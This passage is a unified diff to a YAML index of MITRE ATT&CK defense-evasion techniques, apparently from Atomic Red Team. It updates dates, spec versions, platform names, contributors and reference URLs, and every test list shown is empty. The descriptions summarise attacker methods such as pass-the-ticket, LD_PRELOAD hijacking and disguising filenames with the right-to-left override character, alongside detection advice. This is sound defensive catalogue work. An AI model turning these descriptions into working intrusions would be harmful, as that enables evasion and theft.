         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -5694,16 +5833,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -6718,7 +6838,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -6879,7 +7002,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -7116,7 +7233,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -7225,7 +7342,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
